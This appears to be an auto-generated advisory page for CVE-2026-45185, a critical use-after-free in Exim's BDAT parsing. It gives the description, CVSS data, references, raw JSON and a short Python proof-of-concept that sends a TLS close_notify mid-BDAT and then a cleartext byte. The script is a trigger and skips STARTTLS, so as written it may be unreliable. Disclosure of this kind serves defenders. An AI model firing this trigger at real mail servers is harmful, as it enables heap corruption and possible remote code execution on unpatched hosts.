Security Vulnerability Report
CVE-2026-45185 CVSS 9.8 CRITICAL

Published: 2026-05-12 20:16:46
Last Modified: 2026-05-12 21:16:17

Description

Exim before 4.99.3, in certain GnuTLS configurations, has a remotely reachable use-after-free in the BDAT body parsing path. It is triggered when a client sends a TLS close_notify mid-body during a CHUNKING transfer, followed by a final cleartext byte on the same TCP connection. This can lead to heap corruption. An unauthenticated network attacker exploiting this vulnerability could execute arbitrary code.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness: CWE-416 (Use After Free)

Configurations (Affected Products)

Exim < 4.99.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket
import ssl


def exploit_poc(target_host, target_port):
    # Create TCP connection
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_host, target_port))

    # Upgrade to TLS
    context = ssl.create_default_context()
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    tls_sock = context.wrap_socket(sock, server_hostname=target_host)

    # SMTP Handshake
    tls_sock.send(b'EHLO attacker\r\n')
    tls_sock.send(b'MAIL FROM:<attacker@local>\r\n')
    tls_sock.send(b'RCPT TO:<victim@local>\r\n')

    # Initiate CHUNKING (BDAT)
    tls_sock.send(b'BDAT 512\r\n')

    # Send partial body data
    tls_sock.send(b'A' * 256)

    # Trigger Vulnerability: Send TLS close_notify
    # This closes the TLS layer but keeps TCP open
    tls_sock.unwrap()

    # Send final cleartext byte on the same TCP connection
    # This triggers the Use-After-Free in BDAT parsing
    sock.send(b'\x00')
    sock.close()


# Usage: exploit_poc('127.0.0.1', 25)
```

References

- https://code.exim.org/exim/wiki/wiki/EximSecurity
- https://exim.org
- https://exim.org/static/doc/security/CVE-2026-45185.txt
- https://exim.org/static/doc/security/EXIM-Security-2026-05-01.1/
- https://news.ycombinator.com/item?id=48111748
- https://www.openwall.com/lists/oss-security/2026/05/12/4
- https://xbow.com/blog/dead-letter-cve-2026-45185-xbow-found-rce-exim

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-45185",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T20:16:46.137",
    "lastModified": "2026-05-12T21:16:16.807",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Exim before 4.99.3, in certain GnuTLS configurations, has a remotely reachable use-after-free in the BDAT body parsing path. It is triggered when a client sends a TLS close_notify mid-body during a CHUNKING transfer, followed by a final cleartext byte on the same TCP connection. This can lead to heap corruption. An unauthenticated network attacker exploiting this vulnerability could execute arbitrary code."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-416" }
        ]
      }
    ],
    "references": [
      { "url": "https://code.exim.org/exim/wiki/wiki/EximSecurity", "source": "[email protected]" },
      { "url": "https://exim.org", "source": "[email protected]" },
      { "url": "https://exim.org/static/doc/security/CVE-2026-45185.txt", "source": "[email protected]" },
      { "url": "https://exim.org/static/doc/security/EXIM-Security-2026-05-01.1/", "source": "[email protected]" },
      { "url": "https://news.ycombinator.com/item?id=48111748", "source": "[email protected]" },
      { "url": "https://www.openwall.com/lists/oss-security/2026/05/12/4", "source": "[email protected]" },
      { "url": "https://xbow.com/blog/dead-letter-cve-2026-45185-xbow-found-rce-exim", "source": "[email protected]" }
    ]
  }
}
```